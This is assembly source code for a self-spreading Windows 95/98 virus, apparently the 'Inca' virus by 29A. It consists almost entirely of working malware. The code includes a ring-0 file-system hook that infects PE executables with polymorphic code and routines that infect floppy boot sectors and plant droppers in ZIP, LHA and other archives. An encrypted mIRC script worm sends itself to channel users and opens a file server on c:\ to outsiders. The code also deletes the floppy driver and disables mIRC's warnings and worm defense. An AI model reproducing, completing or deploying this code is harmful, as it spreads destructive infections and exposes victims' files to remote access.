ScriptSize Equ ScriptIniEnd - ScriptIni
|
|
ScriptIni:
|
|
[script]
|
|
n0=run $mircdirinca.exe ;run virus dropper when mIRC
|
|
;start
|
|
n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }
|
|
n2= /dcc send $nick $mircdirscript.ini
|
|
n3= /dcc send $nick $mircdirinca.exe
|
|
n4=}
|
|
n5=ON 1:PART:#:{ /if ( $nick == $me ) { halt }
|
|
n6= /dcc send $nick $mircdirscript.ini
|
|
n7= /dcc send $nick $mircdirinca.exe
|
|
n8=} ;on /JOIN and /LEAVE, we send
|
|
;the script and the virus
|
|
;dropper to the target
|
|
n9=ON 1:TEXT:*el_inca*:#:/run $mircdirrevenge.com
|
|
;when this is said, the souls
|
|
;of thousands of dead Inca
|
|
;indians come to take revenge
|
|
n10=ON 1:TEXT:*ancev*:#:/fserve $nick 666 c:\
|
|
;just for the case that the
|
|
;host have something i want ;)
|
|
n11=ON 1:TEXT:*_29A_*:#:/quit
|
|
;everybody bow in awe before
|
|
;our power!!
|
|
ScriptIniEnd Equ This Byte
|
|
|
|
ScriptName db 'SCRIPT.INI', 0
|
|
|
|
ScriptName2 db 'SCRIPT.OLD', 0
|
|
|
|
MircIni db 'MIRC.INI', 0
|
|
|
|
InsertSize Equ IMircIniEnd - IMircIni
|
|
IMircIni:
|
|
db 13, 10 ;this is inserted in MIRC.INI
|
|
db '[fileserver]', 13, 10 ;to avoid warnings when we
|
|
db 'Warning=Off', 13, 10 ;start the /FSERVER
|
|
IMircIniEnd Equ This Byte
|
|
|
|
|
|
|
|
BeginProc FONO98_Device_Init
|
|
VMMCall Close_Boot_Log
|
|
xor al, al
|
|
mov [OurFile], al
|
|
mov [UpDown], al
|
|
mov [Compressed], al
|
|
mov [FloppyInUse], al ;init flags
|
|
in ax, 40h
|
|
ror eax, 16
|
|
in ax, 40h
|
|
mov dword ptr [seed], eax ;init rnd seed
|
|
mov esi, offset32 ScriptIni
|
|
mov edi, esi
|
|
mov ecx, ScriptSize
|
|
DecriptScript:
|
|
lodsb
|
|
not al ;decript viral script.ini
|
|
stosb
|
|
loop DecriptScript
|
|
GetPathToVMM:
|
|
cld
|
|
VMMCall Get_Exec_Path
|
|
jc ErrorDone
|
|
mov edi, edx
|
|
mov ecx, 0ffh
|
|
xor al, al
|
|
repne scasb ;find end of string
|
|
sub edi, edx
|
|
mov ecx, edi
|
|
mov edi, edx
|
|
mov esi, offset32 VMM32Path
|
|
pushad
|
|
xchg esi, edi
|
|
push ecx
|
|
rep movsb ;copy it to our buffer
|
|
std ;(next time i will use
|
|
pop ecx ;GetSystemPath, i swear ;)
|
|
mov al, "\"
|
|
repne scasb
|
|
cld
|
|
inc edi
|
|
inc edi
|
|
DeleteFloppyVxD:
|
|
pushad
|
|
mov esi, offset32 FloppyVxD
|
|
mov ecx, SizeFloppyVxDName
|
|
rep movsb ;HSFLOP.PDR
|
|
mov eax, R0_FILEATTRIBUTES+SET_ATTRIBUTES
|
|
xor ecx, ecx
|
|
mov esi, offset32 VMM32Path
|
|
VxDCall IFSMgr_Ring0_FileIO ;kill attribs and delete the
|
|
mov eax, R0_DELETEFILE ;32bit driver for floppies
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
popad
|
|
CopyMyVxDName:
|
|
mov esi, offset32 MyVxDName
|
|
mov ecx, SizeVxDName
|
|
rep movsb ;append viral vxd and path
|
|
popad
|
|
ReadVxDAndCompress:
|
|
mov eax, R0_OPENCREATFILE
|
|
mov ebx, 0ff00h
|
|
xor ecx, ecx
|
|
mov edx, 1
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
jc ErrorDone ;autopen vxd
|
|
mov ebx, eax
|
|
mov eax, R0_GETFILESIZE
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
jc ErrorDone
|
|
mov [VxDOriginalSize], ax
|
|
mov [VxDSize2], ax
|
|
mov ecx, eax
|
|
call AllocMemory ;alloc some memory and read
|
|
jz ErrorDone ;our vxd to this buffer
|
|
mov [BufferOneHandle], eax
|
|
mov esi, eax
|
|
mov eax, R0_READFILE
|
|
xor edx, edx
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
jnc NoError
|
|
ErrorFreeBlock:
|
|
mov eax, [BufferOneHandle]
|
|
call DeAllocMemory
|
|
jmp ErrorDone
|
|
NoError:
|
|
mov eax, R0_CLOSEFILE
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
mov ecx, (512*18)*2
|
|
call AllocMemory
|
|
jz ErrorDone
|
|
mov [BufferTwoHandle], eax
|
|
mov esi, [BufferOneHandle]
|
|
mov edi, eax
|
|
mov [VxDCompressedBuffer], edi
|
|
call Compress32 ;compress VXD using a simple
|
|
mov [VxDCompressSize], cx ;RLE scheme
|
|
mov [VxDCompressedSize], ecx
|
|
mov [VxDSize1], cx
|
|
mov esi, [BufferOneHandle]
|
|
push esi
|
|
mov byte ptr [maq], 0
|
|
call gldr ;make poly boot (16bit)
|
|
pop ecx
|
|
xchg ecx, edi
|
|
sub ecx, edi
|
|
mov [PolyBootSize], ecx
|
|
mov edx, [BufferOneHandle]
|
|
push HEAPNOCOPY
|
|
push ecx
|
|
push edx
|
|
VMMCall _HeapReAllocate ;set buffer to right size
|
|
add esp, 12
|
|
mov [PolyBootBuffer], eax
|
|
mov ecx, 20000
|
|
call AllocMemory
|
|
jz ErrorDone
|
|
mov esi, eax
|
|
push eax
|
|
mov byte ptr [maq], -1
|
|
call gldr ;generate file poly (16bit)
|
|
mov ah, byte ptr [key]
|
|
mov esi, offset32 Loader
|
|
mov ecx, LoaderSize
|
|
DosEncriptLoop:
|
|
lodsb
|
|
xor al, ah
|
|
stosb
|
|
loop DosEncriptLoop ;encript loader
|
|
mov esi, [VxDCompressedBuffer]
|
|
mov ecx, [VxDCompressedSize]
|
|
DosEncriptLoop2:
|
|
lodsb
|
|
xor al, ah
|
|
stosb
|
|
loop DosEncriptLoop2 ;zopy and encript vxd
|
|
pop ecx
|
|
mov edx, ecx
|
|
xchg ecx, edi
|
|
sub ecx, edi
|
|
mov [PolyDOSFileSize], ecx
|
|
mov [PEDOSSize], ecx
|
|
push HEAPNOCOPY
|
|
push ecx
|
|
push edx
|
|
VMMCall _HeapReAllocate
|
|
add esp, 12
|
|
mov [PolyDOSFileBuffer], eax
|
|
mov ecx, 40000
|
|
call AllocMemory
|
|
jz ErrorDone
|
|
mov edi, eax
|
|
mov ecx, [PolyDOSFileSize]
|
|
add ecx, PELoaderSize
|
|
call peng ;make our cool PE poly (32bit)
|
|
push HEAPNOCOPY
|
|
mov [PolyPESize], ecx
|
|
push ecx
|
|
push edx
|
|
VMMCall _HeapReAllocate
|
|
add esp, 12
|
|
mov [PolyPEBuffer], eax
|
|
InstallAPIHook:
|
|
mov eax, offset32 FONO98_File_System
|
|
push eax ;install our file hook
|
|
VxDCall IFSMgr_InstallFileSystemApiHook
|
|
add esp, 4
|
|
mov [NextHook], eax
|
|
InstallV86Hook:
|
|
mov eax, 13h ;install our disk hook
|
|
mov esi, offset32 FONO98_Disk_System
|
|
VMMCall Hook_V86_Int_Chain
|
|
clc
|
|
db 0b0h ;from here, is a mov al, xx
|
|
ErrorDone:
|
|
db 0fdh ;from here, is a stc ;)
|
|
ret
|
|
EndProc FONO98_Device_Init
|
|
|
|
|
|
|
|
BeginProc FONO98_Disk_System
|
|
pushad
|
|
cmp [FloppyInUse], 0
|
|
jne Exit13Error ;dont reenter
|
|
inc [FloppyInUse]
|
|
cmp [OurFile], 0 ;we're infecting?
|
|
jnz Exit13
|
|
movzx eax, word ptr [ebp.Client_AX]
|
|
movzx ecx, word ptr [ebp.Client_CX]
|
|
movzx edx, word ptr [ebp.Client_DX]
|
|
cmp ax, 201h
|
|
jne Exit13
|
|
cmp cx, 1
|
|
jne Exit13
|
|
or dx, dx
|
|
jnz Exit13 ;if not floppy boot, exit
|
|
InfectBoot:
|
|
mov ebx, offset32 SectorBuffer
|
|
VxDInt 13h
|
|
jc Exit13
|
|
mov ax, word ptr [ebx]
|
|
cmp al, 0ebh ;if sector dont start with a
|
|
jne Exit13 ;short jump, bail out
|
|
movzx eax, ah
|
|
lea eax, [ebx+eax+2] ;calculate destination of
|
|
cmp word ptr [ebx+1feh], 0aa55h ;jump(to insert out code)
|
|
jne Exit13
|
|
cmp word ptr [ebx.bpb_t_s], 2880 ;is a valid 1.44 floppy?
|
|
jne Exit13
|
|
sub word ptr [ebx.bpb_t_s], 18*2 ;steal 36 sectorz
|
|
push eax
|
|
mov ecx, [PolyBootSize]
|
|
add eax, ecx
|
|
sub eax, ebx
|
|
cmp eax, 510
|
|
pop edi
|
|
jae Exit13 ;will our code use more space
|
|
mov esi, [PolyBootBuffer] ;than we have?
|
|
rep movsb
|
|
mov eax, 301h ;write our cool boot sector
|
|
inc ecx
|
|
VxDInt 13h
|
|
jc Exit13
|
|
mov eax, 312h
|
|
sub edx, edx
|
|
mov ecx, 4f01h
|
|
mov ebx, [VxDCompressedBuffer]
|
|
VxDInt 13h ;write first part of compressed
|
|
jc Exit13 ;VXD
|
|
mov eax, 312h
|
|
mov edx, 100h
|
|
mov ecx, 4f01h
|
|
mov ebx, [VxDCompressedBuffer]
|
|
add ebx, 512*18 ;write the second part of it
|
|
VxDInt 13h
|
|
jc Exit13
|
|
mov eax, 0302h
|
|
mov edx, 0100h
|
|
mov ecx, 000fh ;write loader to the end of the
|
|
mov ebx, offset32 BootLoader ;root directory
|
|
VxDInt 13h
|
|
jc Exit13
|
|
Exit13:
|
|
mov [FloppyInUse], 0
|
|
Exit13Error:
|
|
popad
|
|
stc ;service not finished
|
|
ret
|
|
EndProc FONO98_Disk_System
|
|
|
|
|
|
|
|
BeginProc FONO98_File_System, High_Freq
|
|
push ebp
|
|
mov ebp, esp
|
|
sub esp, 20h
|
|
cmp [ebp+12], IFSFN_Open
|
|
jne ExitNow ;only hook FileOpenz
|
|
WeAreUsingAPI:
|
|
cmp [OurFile], 0
|
|
jnz ExitNow ;recursive?
|
|
inc [OurFile]
|
|
GetPlainName:
|
|
pushad
|
|
mov ebx, offset32 FileName
|
|
mov eax, [ebp+16]
|
|
cmp al, -1
|
|
je NoDrive
|
|
add al, "@"
|
|
mov byte ptr [ebx], al ;if drive specificated,
|
|
inc ebx ;get it
|
|
mov byte ptr [ebx], ":"
|
|
inc ebx
|
|
NoDrive:
|
|
push BCS_WANSI
|
|
push 255
|
|
mov eax, [ebp+28]
|
|
mov eax, [eax+0ch]
|
|
add eax, 4
|
|
push eax
|
|
push ebx
|
|
VxDCall UniToBCSPAth ;make UNICODE a ASCII in our
|
|
add sp, 16 ;buffer
|
|
mov esi, ebx
|
|
add esi, eax
|
|
sub ebx, 2
|
|
mov byte ptr [esi], 0
|
|
push esi
|
|
mov eax, R0_FILEATTRIBUTES+GET_ATTRIBUTES
|
|
mov esi, offset32 FileName
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
mov [FileAttr], ecx ;save attributes
|
|
jc ExitCorrect
|
|
mov eax, R0_FILEATTRIBUTES+SET_ATTRIBUTES
|
|
xor ecx, ecx
|
|
mov esi, offset32 FileName
|
|
VxDCall IFSMgr_Ring0_FileIO ;kill attributes
|
|
pop esi
|
|
cmp dword ptr [esi-8], '23CR'
|
|
jne NomIRC ;we're opening MIRC32.EXE??
|
|
cmp word ptr [esi-10], 'IM'
|
|
jne NomIRC
|
|
cmp dword ptr [esi-4], 'EXE.'
|
|
jne NomIRC
|
|
DropWorm:
|
|
pushad
|
|
mov eax, R0_OPENCREAT_IN_CONTEXT
|
|
mov ebx, 2
|
|
mov cx, 01b
|
|
mov edx, 11h
|
|
mov esi, offset32 Killer ;create our payload file
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
mov ebx, eax
|
|
jc ErrorWorm
|
|
mov eax, R0_WRITEFILE
|
|
mov esi, offset32 KCode ;write payload code to it
|
|
mov ecx, KCodeSize
|
|
sub edx, edx
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
mov eax, R0_CLOSEFILE
|
|
VxDCall IFSMgr_Ring0_FileIO ;close it
|
|
mov eax, R0_OPENCREAT_IN_CONTEXT
|
|
mov ebx, 2
|
|
xor cx, cx
|
|
mov edx, 11h
|
|
mov esi, offset32 MircIni ;open MIRC.INI
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
mov ebx, eax
|
|
jc ErrorWorm
|
|
mov eax, R0_GETFILESIZE
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
jc ErrorWorm
|
|
mov edx, eax
|
|
mov eax, R0_WRITEFILE
|
|
mov esi, offset32 IMircIni ;set /FSERVER warnings off, so
|
|
mov ecx, InsertSize ;we can access this machine
|
|
VxDCall IFSMgr_Ring0_FileIO ;with impunity ;)
|
|
jc ErrorWorm
|
|
mov eax, R0_CLOSEFILE
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
mov eax, R0_OPENCREAT_IN_CONTEXT
|
|
mov ebx, 2
|
|
mov ecx, 01b
|
|
mov edx, 11h
|
|
mov esi, offset32 ScriptName2 ;create SCRIPT.NOT, to avoid
|
|
VxDCall IFSMgr_Ring0_FileIO ;build-in worm defense in
|
|
jc ErrorWorm ;mIRC
|
|
mov ebx, eax
|
|
mov eax, R0_CLOSEFILE
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
mov eax, R0_OPENCREAT_IN_CONTEXT
|
|
mov ebx, 2
|
|
mov ecx, 01b
|
|
mov edx, 11h ;create SCRIPT.INI
|
|
mov esi, offset32 ScriptName
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
jc ErrorWorm
|
|
mov ebx, eax
|
|
mov eax, R0_WRITEFILE
|
|
xor edx, edx
|
|
mov esi, offset32 ScriptIni ;write our inet spreading worm
|
|
mov ecx, ScriptSize ;and get ready to travel! :)
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
mov eax, R0_CLOSEFILE
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
mov eax, R0_OPENCREAT_IN_CONTEXT
|
|
mov ebx, 2
|
|
mov ecx, 01b
|
|
mov edx, 11h
|
|
mov esi, offset32 IncaName ;create virus dropper for inet
|
|
VxDCall IFSMgr_Ring0_FileIO ;spreading
|
|
jc ErrorWorm
|
|
mov ebx, eax
|
|
mov eax, R0_WRITEFILE
|
|
xor edx, edx
|
|
mov esi, [PolyDOSFileBuffer]
|
|
mov ecx, [PolyDOSFileSize]
|
|
VxDCall IFSMgr_Ring0_FileIO ;write dropper code
|
|
mov eax, R0_CLOSEFILE
|
|
VxDCall IFSMgr_Ring0_FileIO ;close it
|
|
ErrorWorm:
|
|
popad
|
|
NomIRC:
|
|
mov eax, dword ptr [esi-4]
|
|
not eax ;get extension(with little
|
|
cmp eax, not 'AHL.' ;encription to avoid lamerz)
|
|
je LHAInfect
|
|
cmp eax, not 'HZL.'
|
|
je LHAInfect
|
|
cmp eax, not 'KAP.'
|
|
je LHAInfect
|
|
cmp eax, not 'PIZ.' ;if archivers, go drop virus
|
|
je InfectZIP
|
|
cmp eax, not 'JRA.'
|
|
je InfectARJ
|
|
cmp eax, not 'RAR.'
|
|
je InfectRAR
|
|
cmp eax, not 'RCS.'
|
|
je InfectExecutableFile
|
|
cmp eax, not 'EXE.' ;if EXE or SCR, check for PE
|
|
jne ExitUnmark
|
|
|
|
InfectExecutableFile:
|
|
mov eax, R0_OPENCREATFILE
|
|
mov ebx, 2
|
|
xor cx, cx
|
|
mov edx, 11h
|
|
mov esi, offset32 FileName
|
|
VxDCall IFSMgr_Ring0_FileIO ;open probable host
|
|
mov [FileHandle], eax
|
|
jc ExitUnmark
|
|
mov ebx, eax
|
|
mov eax, R0_GETFILESIZE
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
jc ExitClose
|
|
mov [FileSize], eax
|
|
cmp eax, MINSIZEINFECT
|
|
jb ExitClose ;if too small, exit
|
|
mov eax, R0_READFILE
|
|
mov esi, offset32 CrcTab
|
|
mov ecx, 1024
|
|
xor edx, edx
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
jc ExitClose
|
|
cmp word ptr [esi], 'ZM'
|
|
je NEPECheck
|
|
cmp word ptr [esi], 'MZ'
|
|
jne ExitClose ;must be a EXE file
|
|
|
|
NEPECheck:
|
|
mov eax, [FileSize]
|
|
cmp dword ptr [esi+3ch], 0
|
|
jz ExitClose
|
|
cmp dword ptr [esi+3ch], eax ;probable PE sign in range?
|
|
ja ExitClose
|
|
|
|
InfectPE:
|
|
cmp [esi+3ch], 1024
|
|
jae ExitClose
|
|
lea eax, [esi+3ch]
|
|
add esi, [eax]
|
|
cmp dword ptr [esi], 'EP' ;must be a PE file
|
|
jne ExitClose
|
|
mov eax, R0_CLOSEFILE
|
|
mov ebx, [FileHandle]
|
|
VxDCall IFSMgr_Ring0_FileIO ;ready to infect, close file
|
|
mov ebp, 32*1024
|
|
call VxDMapFile ;map file in memory
|
|
jc ExitUnmark
|
|
call InfectPEFile ;infect it!
|
|
call VxDUnMapFile
|
|
jmp ExitUnmark ;unmap file
|
|
|
|
;this code goes inserted in
|
|
;PE filez, after the poly
|
|
PELoader: ;decription routine
|
|
call set_SEH
|
|
mov esp, [esp+8]
|
|
jmp ReturnHost ;if a fault happen, jump host
|
|
set_SEH:
|
|
xor edx, edx ;setup a SEH for us
|
|
push dword ptr fs:[edx]
|
|
mov dword ptr fs:[edx], esp
|
|
call PEDelta
|
|
PEDelta:
|
|
pop ebp
|
|
sub ebp, (offset32 PEDelta-offset32 PELoader)
|
|
call AnaliseKernel32 ;get GetModuleHandleA and
|
|
jc ReturnHost ;GetProcAddressA from kernel32
|
|
;export table
|
|
lea esi, [ebp+(offset32 NamePtr-offset32 PELoader)]
|
|
lea edi, [ebp+(offset32 FAdress-offset32 PELoader)]
|
|
cld
|
|
GetFunctionAdress:
|
|
lodsd
|
|
or eax, eax
|
|
jz EndTable
|
|
add eax, ebp
|
|
call MyGetProcAdress ;get RVA of all functionz we
|
|
jc ReturnHost ;need
|
|
stosd
|
|
jmp GetFunctionAdress
|
|
EndTable:
|
|
sub eax, eax
|
|
push eax
|
|
push 010b
|
|
push 2 ;create W95INCA.COM in root
|
|
push eax ;dir
|
|
push 3
|
|
push 80000000h+40000000h
|
|
lea eax, [ebp+(offset32 PEName-offset32 PELoader)]
|
|
push eax
|
|
call dword ptr [ebp+(offset32 _CreateFile-offset32 PELoader)]
|
|
mov ebx, eax
|
|
inc eax
|
|
jz ReturnHost
|
|
push 0
|
|
lea eax, [ebp+(offset32 nWrite-offset32 PELoader)]
|
|
push eax
|
|
mov eax, 12345678h
|
|
PEDOSSize equ dword ptr $-4
|
|
push eax
|
|
mov eax, ebp
|
|
add eax, offset32 PELoaderSize ;write the DOS dropper in it
|
|
push eax
|
|
push ebx
|
|
call dword ptr [ebp+(offset32 _WriteFile-offset32 PELoader)]
|
|
push ebx ;close the file
|
|
call dword ptr [ebp+(offset32 _CloseHandle-offset32 PELoader)]
|
|
push 0
|
|
lea eax, [ebp+(offset32 PEName-offset32 PELoader)]
|
|
push eax ;f0rk DOS process
|
|
call dword ptr [ebp+(offset32 _WinExec-offset32 PELoader)]
|
|
push 3000 ;have 3 seconds to run
|
|
call dword ptr [ebp+(offset32 _Sleep-offset32 PELoader)]
|
|
lea eax, [ebp+(offset32 PEName-offset32 PELoader)]
|
|
push eax ;delete the dropper
|
|
call dword ptr [ebp+(offset32 _DeleteFile-offset32 PELoader)]
|
|
ReturnHost:
|
|
xor edx, edx
|
|
pop dword ptr fs:[edx]
|
|
pop edx
|
|
mov eax, 12345678h ;set base
|
|
LoadBase equ dword ptr $-4
|
|
add eax, 12345678h
|
|
OldIP equ dword ptr $-4 ;add host entry_point
|
|
push eax
|
|
ret
|
|
|
|
AnaliseKernel32:
|
|
mov edx, 0bff70000h ;base of KERNEL32 in win95/98
|
|
mov eax, edx
|
|
mov ebx, eax
|
|
add eax, [eax+3ch]
|
|
add ebx, [eax+120]
|
|
lea eax, [ebp+(offset32 gmh-offset32 PELoader)]
|
|
;string is 17 bytes long
|
|
mov [ebp+(offset32 szSearch-offset32 PELoader)], 17
|
|
;and setup pointer
|
|
mov [ebp+(offset32 strSearch-offset32 PELoader)], eax
|
|
call SearchET ;search export tabel for it
|
|
jc a_error
|
|
mov dword ptr [ebp+(offset32 pGetModuleHandle-offset32 PELoader)], eax
|
|
lea eax, [ebp+(offset32 gpa-offset32 PELoader)]
|
|
;string is 15 bytes long
|
|
mov [ebp+(offset32 szSearch-offset32 PELoader)], 15
|
|
;and setup pointer
|
|
mov [ebp+(offset32 strSearch-offset32 PELoader)], eax
|
|
call SearchET
|
|
jc a_error
|
|
mov dword ptr [ebp+(offset32 pGetProcAdress-offset32 PELoader)], eax
|
|
lea eax, [ebp+(offset32 kernel-offset32 PELoader)]
|
|
push eax
|
|
mov eax, [ebp+(offset32 pGetModuleHandle-offset32 PELoader)]
|
|
call eax ;get KERNEL32 module
|
|
mov dword ptr [ebp+(offset32 pKernel32Adress-offset32 PELoader)], eax
|
|
a_error:
|
|
ret
|
|
|
|
MyGetProcAdress:
|
|
push eax
|
|
push dword ptr [ebp+(offset32 pKernel32Adress-offset32 PELoader)]
|
|
mov eax, [ebp+(offset32 pGetProcAdress-offset32 PELoader)]
|
|
call eax
|
|
or eax, eax ;call GetProcAddress to get
|
|
jz GPAError ;all RVA we need
|
|
test al, 12h
|
|
org $-1 ;the good'n'old trick again ;)
|
|
GPAError:
|
|
stc
|
|
ret
|
|
|
|
SearchET:
|
|
mov eax, [ebx+32] ;search export table of
|
|
add eax, edx ;KERNEL32, searching the
|
|
ff:
|
|
mov esi, [eax] ;the names, then the ordinal
|
|
or esi, esi ;and, finally the RVA pointerz
|
|
jz fuck
|
|
add esi, edx
|
|
mov edi, 12345678h
|
|
strSearch equ dword ptr $-4
|
|
mov ecx, 12345678h
|
|
szSearch equ dword ptr $-4
|
|
rep cmpsb
|
|
jz found
|
|
add eax, 4
|
|
jmp ff
|
|
found:
|
|
sub eax, [ebx+32]
|
|
sub eax, edx
|
|
shr eax, 1
|
|
add eax, [ebx+36]
|
|
add eax, edx
|
|
movzx eax, word ptr [eax]
|
|
shl eax, 2
|
|
add eax, [ebx+28]
|
|
add eax, edx
|
|
mov eax, [eax]
|
|
add eax, edx
|
|
mov cl, 12h
|
|
org $-1
|
|
fuck:
|
|
stc
|
|
ret
|
|
|
|
kernel db 'KERNEL32', 0
|
|
|
|
nWrite dd 0
|
|
|
|
pGetProcAdress dd 0
|
|
pGetModuleHandle dd 0
|
|
pKernel32Adress dd 0bff70000h
|
|
|
|
gpa db 'GetProcAddress', 0
|
|
gmh db 'GetModuleHandleA', 0
|
|
|
|
sCreateFile db 'CreateFileA', 0
|
|
sWriteFile db 'WriteFile', 0
|
|
sCloseHandle db 'CloseHandle', 0
|
|
sWinExec db 'WinExec', 0
|
|
sDeleteFile db 'DeleteFileA', 0
|
|
sSleep db 'Sleep', 0
|
|
|
|
NamePtr equ this byte
|
|
dd (offset32 sCreateFile-offset32 PELoader)
|
|
dd (offset32 sWriteFile-offset32 PELoader)
|
|
dd (offset32 sCloseHandle-offset32 PELoader)
|
|
dd (offset32 sWinExec-offset32 PELoader)
|
|
dd (offset32 sDeleteFile-offset32 PELoader)
|
|
dd (offset32 sSleep-offset32 PELoader)
|
|
dd 0
|
|
|
|
PEName db 'C:\W95INCA.COM', 0
|
|
|
|
FAdress equ this byte
|
|
_CreateFile dd 0
|
|
_WriteFile dd 0
|
|
_CloseHandle dd 0
|
|
_WinExec dd 0
|
|
_DeleteFile dd 0
|
|
_Sleep dd 0
|
|
|
|
PELoaderEnd equ this byte
|
|
|
|
PELoaderSize equ offset32 PELoaderEnd - offset32 PELoader
|
|
|
|
|
|
InfectPEFile:
|
|
mov ebp, [esi+3ch] ;esi point to maped base
|
|
add ebp, esi ;ebp point to PE header
|
|
mov eax, 12345678h
|
|
cmp dword ptr [ebp+58h], eax ;is already infected?
|
|
mov dword ptr [ebp+58h], eax
|
|
je PE_done
|
|
mov eax, dword ptr [ebp+52]
|
|
cmp eax, 400000h ;normal base for appz
|
|
mov [LoadBase], eax
|
|
jne PE_done
|
|
movzx eax, word ptr [ebp+4h]
|
|
test eax, 2000h ;not infect DLL
|
|
jnz PE_done
|
|
movzx ecx, word ptr [ebp+6] ;numba of sectionz
|
|
mov eax, 40
|
|
sub edx, edx
|
|
mul ecx
|
|
add eax, ebp
|
|
add eax, 24
|
|
movzx ecx, word ptr [ebp+20] ;header size
|
|
add eax, ecx
|
|
mov edi, eax ;edi point to free entry
|
|
mov edx, eax
|
|
mov ecx, 40
|
|
sub eax, eax
|
|
repz scasb ;is really a free entry?
|
|
jnz PE_done
|
|
inc word ptr [ebp+6] ;inc number of sectionz
|
|
call rnd ;make new name
|
|
and eax, 11b
|
|
add eax, 4
|
|
mov ecx, eax
|
|
mov edi, edx
|
|
mName:
|
|
call rnd ;random letter for a random
|
|
and eax, 01111b ;name
|
|
add al, 'A'
|
|
stosb
|
|
loop mName
|
|
mov edi, edx
|
|
mov dword ptr [edi+36], 0e0000040h ;set section attribz
|
|
mov eax, [edi-40+12] ;prev virtual address
|
|
add eax, [edi-40+08] ;prev virtual size
|
|
call ObjAlign
|
|
mov [edi+12], eax ;virtual address
|
|
mov eax, [edi-40+16] ;prev offset to data
|
|
add eax, [edi-40+20] ;prev size of data
|
|
call FileAlign
|
|
mov [edi+20], eax ;offset to data
|
|
push eax
|
|
mov eax, [PolyPESize]
|
|
add eax, [totsize]
|
|
push eax
|
|
call ObjAlign
|
|
mov [edi+8], eax
|
|
add [ebp+80], eax
|
|
pop eax
|
|
call FileAlign
|
|
mov [edi+16], eax
|
|
mov eax, [edi+12]
|
|
mov ebx, [ebp+28h]
|
|
mov [ebp+28h], eax
|
|
mov [OldIP], ebx
|
|
mov eax, [edi+20]
|
|
add eax, [edi+16]
|
|
mov [VMF_size], eax
|
|
pop edi
|
|
add edi, [VMF_base]
|
|
mov esi, [PolyPEBuffer]
|
|
mov ecx, [PolyPESize]
|
|
rep movsb ;zopy PE poly to end of file
|
|
mov ecx, 30000h
|
|
call AllocMemory
|
|
push eax
|
|
push edi
|
|
push eax
|
|
mov edi, eax
|
|
mov esi, offset32 PELoader ;copy the PE loader
|
|
mov ecx, PELoaderSize
|
|
rep movsb
|
|
mov esi, [PolyDOSFileBuffer]
|
|
mov ecx, [PolyDOSFileSize]
|
|
rep movsb ;and the DOS loader
|
|
pop esi
|
|
pop edi
|
|
call encript_pe ;encript virus code
|
|
pop eax
|
|
call DeAllocMemory
|
|
inc dword ptr [VMF_sucess] ;is infected!
|
|
PE_done:
|
|
ret
|
|
|
|
ObjAlign:
|
|
mov ecx, [ebp+56]
|
|
jmp AlignThis
|
|
FileAlign:
|
|
mov ecx, [ebp+60]
|
|
AlignThis:
|
|
xor edx, edx
|
|
div ecx
|
|
or edx, edx
|
|
jz sAlign ;dont waste aligns when isnt
|
|
inc eax ;need
|
|
sAlign:
|
|
mul ecx
|
|
ret
|
|
|
|
|
|
LHAInfect:
|
|
bt [FileAttr], 0
|
|
jc ExitUnmark ;if read-only, exit
|
|
call PreparateDropper ;(is our marker)
|
|
dec ebp
|
|
mov edi, offset32 LHAFilename
|
|
call Random4Name ;create random name
|
|
mov ecx, [PolyDOSFileSize]
|
|
mov [LHACompressedSize], ecx
|
|
mov [LHAUncompressedSize], ecx
|
|
mov eax, R0_READFILE
|
|
mov ecx, 2
|
|
mov edx, 3
|
|
mov esi, offset32 Pad
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
jc ExitFree
|
|
xor eax, eax
|
|
xchg word ptr [esi], ax
|
|
cmp ax, 'hl'
|
|
jne ExitFree ;is really a LHA/LHZ shit?
|
|
xor ebx, ebx
|
|
mov ecx, LHAHeaderSize-2
|
|
mov esi, offset32 LHAMethod
|
|
CheckSumLoop:
|
|
lodsb
|
|
add bl, al
|
|
loop CheckSumLoop ;funny header checksum loop
|
|
mov [LHAHeaderCRC], bl
|
|
mov eax, R0_WRITEFILE
|
|
mov ebx, [FileHandle]
|
|
mov ecx, LHAHeaderSize
|
|
mov esi, offset32 LHASig
|
|
mov edx, ebp
|
|
add ebp, ecx
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
mov eax, R0_WRITEFILE
|
|
mov ecx, [PolyDOSFileSize]
|
|
mov edx, ebp
|
|
add ebp, ecx
|
|
mov esi, [BufferOneHandle]
|
|
VxDCall IFSMgr_Ring0_FileIO ;write it
|
|
mov eax, R0_WRITEFILE
|
|
mov ecx, 1
|
|
mov edx, ebp
|
|
mov esi, offset32 Pad
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
jmp ExitRO
|
|
|
|
InfectZIP:
|
|
bt [FileAttr], 0
|
|
jc ExitUnmark
|
|
call PreparateDropper ;create dropper
|
|
mov [ZIPRCRC32], eax
|
|
mov [ZIPLCRC32], eax
|
|
mov ecx, [PolyDOSFileSize]
|
|
mov [ZIPRCompressed], ecx
|
|
mov [ZIPRUncompressed], ecx ;set some ZIP stuff
|
|
mov [ZIPLCompressed], ecx
|
|
mov [ZIPLUncompressed], ecx
|
|
mov edi, offset32 ZIPRFileName
|
|
call Random4Name ;random name
|
|
mov eax, dword ptr [ZIPRFileName]
|
|
mov dword ptr [ZIPLFilename], eax
|
|
mov eax, R0_READFILE
|
|
mov ecx, ZIPEHeaderSize
|
|
sub ebp, ecx
|
|
mov edx, ebp
|
|
mov esi, offset32 ZIPReadBuffer
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
jc ExitFree
|
|
cmp word ptr [ZIPEHeaderId], 'KP' ;is a ZIP marker
|
|
jne ExitFree
|
|
cmp word ptr [ZIPSignature], 0605h
|
|
jne ExitFree
